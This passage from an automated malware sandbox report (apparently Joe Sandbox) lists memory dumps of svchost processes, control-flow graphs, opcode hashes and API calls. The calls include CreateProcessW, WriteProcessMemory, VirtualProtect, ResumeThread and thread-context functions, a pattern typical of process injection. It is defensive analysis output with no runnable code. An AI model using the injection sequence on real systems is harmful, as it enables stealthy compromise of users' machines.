                                                                                                                                                                                      • Instruction Fuzzy Hash: 62422BB180DB8A4FE756EF3CC8955A47BE1FF95301F1881FDD189CB2A2E9246806C791
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 957 7ffb4af9e175-7ffb4af9e181 958 7ffb4af9e183 957->958 959 7ffb4af9e185-7ffb4af9e19e 957->959 958->959 960 7ffb4af9e1c5-7ffb4af9e24c 958->960 961 7ffb4af9e1a4-7ffb4af9e1a8 959->961 962 7ffb4af9e1a0-7ffb4af9e1a2 959->962 966 7ffb4af9e256-7ffb4af9e25b 960->966 967 7ffb4af9e24e-7ffb4af9e253 960->967 963 7ffb4af9e1af-7ffb4af9e1b4 961->963 962->963 963->960 968 7ffb4af9e265-7ffb4af9e287 966->968 969 7ffb4af9e25d-7ffb4af9e262 966->969 967->966 970 7ffb4af9e289-7ffb4af9e28e 968->970 971 7ffb4af9e291-7ffb4af9e2f0 CreateProcessW 968->971 969->968 970->971 972 7ffb4af9e2f8-7ffb4af9e325 971->972 973 7ffb4af9e2f2 971->973 973->972
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000B.00000002.1923035679.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffb4af86000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: aaa985b0b469a178082c7f4a72cbccd1c90448e2f0ab7dc543272b17809781f6
                                                                                                                                                                                      • Instruction ID: 727fd5440a1cc09de4afc695c52ad36257004b56e8f108f6e816ec938051bd15
                                                                                                                                                                                      • Opcode Fuzzy Hash: aaa985b0b469a178082c7f4a72cbccd1c90448e2f0ab7dc543272b17809781f6
                                                                                                                                                                                      • Instruction Fuzzy Hash: 3751E17180CB4C8FDB59DF6CD4546AABBF0EB99310F1442AFE489D3291DB34A8458B81
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1080 7ffb4af9e1b9-7ffb4af9e24c 1084 7ffb4af9e256-7ffb4af9e25b 1080->1084 1085 7ffb4af9e24e-7ffb4af9e253 1080->1085 1086 7ffb4af9e265-7ffb4af9e287 1084->1086 1087 7ffb4af9e25d-7ffb4af9e262 1084->1087 1085->1084 1088 7ffb4af9e289-7ffb4af9e28e 1086->1088 1089 7ffb4af9e291-7ffb4af9e2f0 CreateProcessW 1086->1089 1087->1086 1088->1089 1090 7ffb4af9e2f8-7ffb4af9e325 1089->1090 1091 7ffb4af9e2f2 1089->1091 1091->1090
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000B.00000002.1923035679.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffb4af86000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateProcess
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                                                                      • Opcode ID: 21d145a76e5c46facbd82b3c461ff32272c404b528ef4352ac3bfc12c000e002
                                                                                                                                                                                      • Instruction ID: f035a0fde19d374f5abcde7027f3b2bc464cdc62bfb769ec56460c15484efde6
                                                                                                                                                                                      • Opcode Fuzzy Hash: 21d145a76e5c46facbd82b3c461ff32272c404b528ef4352ac3bfc12c000e002
                                                                                                                                                                                      • Instruction Fuzzy Hash: CB51AD7180CB5C8FDB59DF5CD8447A9BBF1EBA9321F0442AFE489D3291DB34A8458B81
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1260 7ffb4af8303a-7ffb4af83047 1261 7ffb4af83052-7ffb4af83063 1260->1261 1262 7ffb4af83049-7ffb4af83051 1260->1262 1263 7ffb4af8306e-7ffb4af8311f VirtualProtect 1261->1263 1264 7ffb4af83065-7ffb4af8306d 1261->1264 1262->1261 1268 7ffb4af83121 1263->1268 1269 7ffb4af83127-7ffb4af8314f 1263->1269 1264->1263 1268->1269
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000B.00000002.1923035679.00007FFB4AF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF80000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffb4af80000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                                      • Opcode ID: 9efb153da3038bd5ecfcf7a27e5445b55e4c771c07f929c22038b4295aada56c
                                                                                                                                                                                      • Instruction ID: b5ab1516b6334f06b7d75eb7ff28f89514c7a8b25dbc5953ac57f277cc013e8c
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9efb153da3038bd5ecfcf7a27e5445b55e4c771c07f929c22038b4295aada56c
                                                                                                                                                                                      • Instruction Fuzzy Hash: FE41F53090CB884FDB19DBA898466E9BFF1EF56321F0402AFD049C31A3CB646456C795
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000B.00000002.1923035679.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffb4af86000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                                                                      • Opcode ID: 61dd414a5340cdc675af230689dffa84cdb788fefe33aa6f028db36aeeb921bc
                                                                                                                                                                                      • Instruction ID: 34be90c5aced5ce688adf3e03467d17467abbe82c4e9e21a5367e72df1640b8a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 61dd414a5340cdc675af230689dffa84cdb788fefe33aa6f028db36aeeb921bc
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5A41E37190CB488FDB18DF58D8856F97BF4FB99311F0042AFE089D3292CA74A805CB91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000B.00000002.1923035679.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffb4af86000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                                                                      • Opcode ID: 837ea3987f010ba7c3c8ba5baa0d51aba1c5c173e1ef6d3b5a2cf3ccadac1929
                                                                                                                                                                                      • Instruction ID: 343f6fec6c85f91aa988251858938a14c8fef08d76be4d1fc24477c43b1528c4
                                                                                                                                                                                      • Opcode Fuzzy Hash: 837ea3987f010ba7c3c8ba5baa0d51aba1c5c173e1ef6d3b5a2cf3ccadac1929
                                                                                                                                                                                      • Instruction Fuzzy Hash: B631187190CB888FDB19DF5CD8466F97BF5EB9A311F04426FE089C3292CA749846C792
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000B.00000002.1923035679.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffb4af86000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ResumeThread
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                                                                      • Opcode ID: d3dbc35e196e45e68d6a53cba0e8d30e1fe5cdb2c38849d0a307135ee0ca9c94
                                                                                                                                                                                      • Instruction ID: d07f77e6558c9170432adc035be4689518dac2e75d8cb95cd1b7c02a0adc4a27
                                                                                                                                                                                      • Opcode Fuzzy Hash: d3dbc35e196e45e68d6a53cba0e8d30e1fe5cdb2c38849d0a307135ee0ca9c94
                                                                                                                                                                                      • Instruction Fuzzy Hash: 1331057190CA4C8FDB58DF68D895BF9BBF4EF95320F0441AFD049C3292DA65A816CB81
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000B.00000002.1923035679.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffb4af86000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 544645111-0
                                                                                                                                                                                      • Opcode ID: 18eb037257c64365a784fc1ab91ddfdd8b22a3e620dd20080b46bcd78eeee5b9
                                                                                                                                                                                      • Instruction ID: b7ac8994e0aecb17eab0efaea183a9112e834003635c5653136aee19ca93f4d3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 18eb037257c64365a784fc1ab91ddfdd8b22a3e620dd20080b46bcd78eeee5b9
                                                                                                                                                                                      • Instruction Fuzzy Hash: AB31D27090CA5C8FDB18DFA8D8466F9BBF5EB95721F04426FE049C3252DB70A856CB81
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000B.00000002.1923035679.00007FFB4AF86000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF86000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffb4af86000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                                                                      • Opcode ID: 38fe85b4340b40f92713a61c18ac6e1c19dfff8cdaf36ce56f567acf80cf0e76
                                                                                                                                                                                      • Instruction ID: f33047b69e5e25e1390e6e5df2e638fd9fbaf48e8bdd823d7385eb381a43ea8d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 38fe85b4340b40f92713a61c18ac6e1c19dfff8cdaf36ce56f567acf80cf0e76
                                                                                                                                                                                      • Instruction Fuzzy Hash: F831E27090C64C8FDB58EF6CD8856FABBE4EB65311F0441AFD049C3192DA70A855CB91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000B.00000002.1923035679.00007FFB4AF80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF80000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffb4af80000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ConsoleFree
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 771614528-0
                                                                                                                                                                                      • Opcode ID: 40e352293348c549cb847f043ef37b1d8f8f8312766f3139040b9fd97dda10c9
                                                                                                                                                                                      • Instruction ID: cb13308d89e1da299588b254200e6fbbe8b9e68f96c85f5212e186a6ccde6045
                                                                                                                                                                                      • Opcode Fuzzy Hash: 40e352293348c549cb847f043ef37b1d8f8f8312766f3139040b9fd97dda10c9
                                                                                                                                                                                      • Instruction Fuzzy Hash: CC21837190CB4C8FDB69DF58D84AAEABBF0EB55310F00416FD049C3652DB756809CB51
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000B.00000002.1924090376.00007FFB4B060000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B060000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_11_2_7ffb4b060000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 326e800c30c9149a29067c75fb0599d341323c60787de19214a4bd274da0c0d6
                                                                                                                                                                                      • Instruction ID: cb09afa57830cbac6c5f500583448c1b9316e10569bc1d4e28d3368541f023a5
                                                                                                                                                                                      • Opcode Fuzzy Hash: 326e800c30c9149a29067c75fb0599d341323c60787de19214a4bd274da0c0d6
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6FD156B290EBC64FE756AF3CD8561A47FE1EF56201B0841FFD189C72E3D91868168392
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                      Execution Coverage:9.6%
                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                      Signature Coverage:33.3%
                                                                                                                                                                                      Total number of Nodes:9
                                                                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                                                                      execution_graph 13136 7ffb4af9303a 13137 7ffb4af93049 VirtualProtect 13136->13137 13139 7ffb4af93121 13137->13139 13144 7ffb4af9090d 13145 7ffb4af9091f FreeConsole 13144->13145 13147 7ffb4af9099e 13145->13147 13140 7ffb4afabc2c 13141 7ffb4afabc35 keybd_event 13140->13141 13143 7ffb4afabce8 13141->13143
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: #uL
                                                                                                                                                                                      • API String ID: 0-1014397383
                                                                                                                                                                                      • Opcode ID: 1ed0db31cf819d34c7c5a758be7087f24a2f961653a2e888169741b45c5685ff
                                                                                                                                                                                      • Instruction ID: c754c0e0d54b38607498197d482b13c922be29dc4baa756f3e84f7876c41de7a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ed0db31cf819d34c7c5a758be7087f24a2f961653a2e888169741b45c5685ff
                                                                                                                                                                                      • Instruction Fuzzy Hash: FEA214B191CA498FE359EF38C4A44A5B7F5FF95301B2445FED08AC72E6EA35A842C740
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 538 7ffb4af9ee79-7ffb4af9eead 541 7ffb4af9eeb5-7ffb4af9eeee 538->541 543 7ffb4af9eef0-7ffb4af9eef5 541->543 544 7ffb4af9ef5f-7ffb4af9ef75 call 7ffb4af9afc0 541->544 546 7ffb4af9ef76-7ffb4af9ef8a 543->546 547 7ffb4af9eef7-7ffb4af9ef11 call 7ffb4af97660 543->547 555 7ffb4af9ef77-7ffb4af9ef8a 544->555 556 7ffb4af9ef8f-7ffb4af9ef9a 544->556 549 7ffb4af9f028-7ffb4af9f02a 546->549 552 7ffb4af9f02c-7ffb4af9f031 549->552 553 7ffb4af9f09b-7ffb4af9f0a0 549->553 557 7ffb4af9f033-7ffb4af9f04f 552->557 558 7ffb4af9f0b2 552->558 553->558 555->549 561 7ffb4af9ef9c-7ffb4af9efaf 556->561 562 7ffb4af9efb1-7ffb4af9efbc 556->562 559 7ffb4af9f0b4-7ffb4af9f0b5 558->559 560 7ffb4af9f0b8-7ffb4af9f106 call 7ffb4af9afc0 * 2 call 7ffb4af972c0 558->560 559->560 577 7ffb4af9f289-7ffb4af9f2e3 560->577 578 7ffb4af9f10c-7ffb4af9f12a 560->578 561->549 565 7ffb4af9efbe-7ffb4af9efd0 562->565 566 7ffb4af9efd2-7ffb4af9eff1 562->566 565->549 566->549 569 7ffb4af9eff3-7ffb4af9f024 566->569 569->549 592 7ffb4af9f416-7ffb4af9f473 577->592 593 7ffb4af9f2e9-7ffb4af9f344 call 7ffb4af9afc0 * 2 call 7ffb4af972c0 577->593 578->577 579 7ffb4af9f130-7ffb4af9f14f 578->579 583 7ffb4af9f1d0-7ffb4af9f1da 579->583 584 7ffb4af9f151-7ffb4af9f170 579->584 585 7ffb4af9f1dc-7ffb4af9f1df 583->585 586 7ffb4af9f20e-7ffb4af9f25f call 7ffb4af9b990 583->586 588 7ffb4af9f172-7ffb4af9f177 584->588 589 7ffb4af9f1e1-7ffb4af9f1f6 584->589 585->586 586->577 602 7ffb4af9f261-7ffb4af9f288 586->602 591 7ffb4af9f1f8-7ffb4af9f209 588->591 594 7ffb4af9f179-7ffb4af9f1c8 call 7ffb4af97660 588->594 589->591 591->586 597 7ffb4af9f20b-7ffb4af9f20c 591->597 607 7ffb4af9f479-7ffb4af9f4ce call 7ffb4af9afc0 * 2 call 7ffb4af972c0 592->607 608 7ffb4af9f52e-7ffb4af9f539 592->608 593->592 616 7ffb4af9f34a-7ffb4af9f3a0 593->616 594->589 604 7ffb4af9f1ca-7ffb4af9f1cf 594->604 597->586 604->583 607->608 624 7ffb4af9f4d0-7ffb4af9f4f4 607->624 614 7ffb4af9f53b-7ffb4af9f53d 608->614 615 7ffb4af9f53e-7ffb4af9f549 608->615 614->615 616->592 619 7ffb4af9f3a2-7ffb4af9f3ed call 7ffb4af9b990 616->619 619->592 625 7ffb4af9f3ef-7ffb4af9f415 619->625 626 7ffb4af9f4f6-7ffb4af9f506 624->626 627 7ffb4af9f522-7ffb4af9f52d 624->627 626->608 628 7ffb4af9f508-7ffb4af9f51f 626->628 628->627
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: OL_H
                                                                                                                                                                                      • API String ID: 0-3734465514
                                                                                                                                                                                      • Opcode ID: 8780dbd23facdb23e3127aea44d07facadff4389f05320ede1c4b0e123a14027
                                                                                                                                                                                      • Instruction ID: 37960301f149beda599124789813f5e5a94f6027b7465afcfa134df033912245
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8780dbd23facdb23e3127aea44d07facadff4389f05320ede1c4b0e123a14027
                                                                                                                                                                                      • Instruction Fuzzy Hash: A6223471A1CB464FD319EF38C4910A1B7E6FBD5305B2486BEE486C72D6EA34E846C781
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 5085c0d4e2f39f1aaca816052e758309c9d5aba23ef3a66d25169cb76bbb41fb
                                                                                                                                                                                      • Instruction ID: 03809d091c8fb1fd6d9892608ab357f31488e86772adffc02d600d485ddedf75
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5085c0d4e2f39f1aaca816052e758309c9d5aba23ef3a66d25169cb76bbb41fb
                                                                                                                                                                                      • Instruction Fuzzy Hash: 62C2D1B1A0DA498FEB99EF28D4956B877E5FF55300F1500FAD44EC72E2DE28AC418B41
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1160 7ffb4afabc2c-7ffb4afabc33 1161 7ffb4afabc35-7ffb4afabc3d 1160->1161 1162 7ffb4afabc3e-7ffb4afabce6 keybd_event 1160->1162 1161->1162 1166 7ffb4afabce8 1162->1166 1167 7ffb4afabcee-7ffb4afabd0b 1162->1167 1166->1167
                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AFA9000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AFA9000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4afa9000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: keybd_event
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 2665452162-0
                                                                                                                                                                                      • Opcode ID: dd89b534788db069128e990c9f1e5726f863219a264eb3fd932b651d9fa72f7e
                                                                                                                                                                                      • Instruction ID: 45c77e7203ee0af52987962713f6db63e09a2ad68d6aec40e4f522c24d8c7eba
                                                                                                                                                                                      • Opcode Fuzzy Hash: dd89b534788db069128e990c9f1e5726f863219a264eb3fd932b651d9fa72f7e
                                                                                                                                                                                      • Instruction Fuzzy Hash: D531097191CB488FDB19EF68D84AAF8BBF4FB56311F10026FD089D3192DA746806CB95
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 1b19c8d56b23c33777f80618f916f93aac96f42af9a329f9a01ce7f65686f03f
                                                                                                                                                                                      • Instruction ID: 33c6fc4422ec57c12593764463a3bd9eef73e1b999366ab15322a3d525676c2d
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1b19c8d56b23c33777f80618f916f93aac96f42af9a329f9a01ce7f65686f03f
                                                                                                                                                                                      • Instruction Fuzzy Hash: B1725471A1CB4A4FE359EF38D4905B177E5EF95300B2045FEE88AC72D6DE28A846C781
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                      • Executed
                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                      control_flow_graph 1806 7ffb4af98980-7ffb4af9d315 1808 7ffb4af9d317-7ffb4af9d35e 1806->1808 1809 7ffb4af9d35f-7ffb4af9d389 1806->1809 1808->1809 1812 7ffb4af9d38b-7ffb4af9d3a0 1809->1812 1813 7ffb4af9d3a2 1809->1813 1814 7ffb4af9d3a4-7ffb4af9d3a9 1812->1814 1813->1814 1816 7ffb4af9d4a6-7ffb4af9d4c6 1814->1816 1817 7ffb4af9d3af-7ffb4af9d3be 1814->1817 1819 7ffb4af9d517-7ffb4af9d522 1816->1819 1823 7ffb4af9d3c8-7ffb4af9d3c9 1817->1823 1824 7ffb4af9d3c0-7ffb4af9d3c6 1817->1824 1821 7ffb4af9d524-7ffb4af9d533 1819->1821 1822 7ffb4af9d4c8-7ffb4af9d4ce 1819->1822 1831 7ffb4af9d535-7ffb4af9d547 1821->1831 1832 7ffb4af9d549 1821->1832 1826 7ffb4af9d4d4-7ffb4af9d4f5 call 7ffb4af98960 1822->1826 1827 7ffb4af9d992-7ffb4af9d9aa 1822->1827 1825 7ffb4af9d3cb-7ffb4af9d3ee 1823->1825 1824->1825 1830 7ffb4af9d443-7ffb4af9d44e 1825->1830 1844 7ffb4af9d4fa-7ffb4af9d514 1826->1844 1839 7ffb4af9d9f4-7ffb4af9da21 1827->1839 1840 7ffb4af9d9ac-7ffb4af9d9e7 call 7ffb4af99538 1827->1840 1835 7ffb4af9d3f0-7ffb4af9d3f6 1830->1835 1836 7ffb4af9d450-7ffb4af9d467 1830->1836 1837 7ffb4af9d54b-7ffb4af9d550 1831->1837 1832->1837 1835->1827 1841 7ffb4af9d3fc-7ffb4af9d440 call 7ffb4af98960 1835->1841 1854 7ffb4af9d496-7ffb4af9d4a1 call 7ffb4af99198 1836->1854 1855 7ffb4af9d469-7ffb4af9d48f call 7ffb4af98960 1836->1855 1842 7ffb4af9d556-7ffb4af9d578 call 7ffb4af98960 1837->1842 1843 7ffb4af9d5dc-7ffb4af9d5f0 1837->1843 1888 7ffb4af9da23-7ffb4af9da2b 1839->1888 1889 7ffb4af9da2c-7ffb4af9da2f 1839->1889 1881 7ffb4af9d9e9-7ffb4af9d9f2 1840->1881 1882 7ffb4af9da31-7ffb4af9da3b 1840->1882 1841->1830 1878 7ffb4af9d5a6-7ffb4af9d5a7 1842->1878 1879 7ffb4af9d57a-7ffb4af9d5a4 1842->1879 1848 7ffb4af9d640-7ffb4af9d64f 1843->1848 1849 7ffb4af9d5f2-7ffb4af9d5f8 1843->1849 1844->1819 1865 7ffb4af9d65c 1848->1865 1866 7ffb4af9d651-7ffb4af9d65a 1848->1866 1850 7ffb4af9d617-7ffb4af9d62f 1849->1850 1851 7ffb4af9d5fa-7ffb4af9d615 1849->1851 1867 7ffb4af9d638-7ffb4af9d63b 1850->1867 1851->1850 1854->1843 1855->1854 1874 7ffb4af9d65e-7ffb4af9d663 1865->1874 1866->1874 1875 7ffb4af9d7e8-7ffb4af9d7fd 1867->1875 1883 7ffb4af9d669-7ffb4af9d66c 1874->1883 1884 7ffb4af9d96f-7ffb4af9d970 1874->1884 1897 7ffb4af9d83d 1875->1897 1898 7ffb4af9d7ff-7ffb4af9d83b 1875->1898 1880 7ffb4af9d5a9-7ffb4af9d5b0 1878->1880 1879->1880 1880->1843 1893 7ffb4af9d5b2-7ffb4af9d5d7 call 7ffb4af98988 1880->1893 1881->1839 1891 7ffb4af9da46-7ffb4af9da57 1882->1891 1892 7ffb4af9da3d-7ffb4af9da45 1882->1892 1895 7ffb4af9d6b4 1883->1895 1896 7ffb4af9d66e-7ffb4af9d680 1883->1896 1894 7ffb4af9d973-7ffb4af9d982 1884->1894 1888->1889 1889->1882 1899 7ffb4af9da59-7ffb4af9da61 1891->1899 1900 7ffb4af9da62-7ffb4af9da9d 1891->1900 1892->1891 1893->1843 1920 7ffb4af9d95e-7ffb4af9d96e 1893->1920 1909 7ffb4af9d983-7ffb4af9d98b 1894->1909 1903 7ffb4af9d6b6-7ffb4af9d6bb 1895->1903 1922 7ffb4af9d686-7ffb4af9d68b 1896->1922 1904 7ffb4af9d83f-7ffb4af9d844 1897->1904 1898->1904 1899->1900 1916 7ffb4af9daa4-7ffb4af9daaf 1900->1916 1917 7ffb4af9da9f call 7ffb4af9afc0 1900->1917 1910 7ffb4af9d7bc-7ffb4af9d7df 1903->1910 1911 7ffb4af9d6c1-7ffb4af9d6cd 1903->1911 1913 7ffb4af9d8b4-7ffb4af9d8c8 1904->1913 1914 7ffb4af9d846-7ffb4af9d89d 1904->1914 1909->1827 1925 7ffb4af9d7e5-7ffb4af9d7e6 1910->1925 1911->1827 1921 7ffb4af9d6d3-7ffb4af9d6e2 1911->1921 1918 7ffb4af9d917-7ffb4af9d923 call 7ffb4af972c0 1913->1918 1919 7ffb4af9d8ca-7ffb4af9d8f3 1913->1919 1961 7ffb4af9d90e-7ffb4af9d914 1914->1961 1962 7ffb4af9d89f-7ffb4af9d8a3 1914->1962 1937 7ffb4af9dac1 1916->1937 1938 7ffb4af9dab1-7ffb4af9dabf 1916->1938 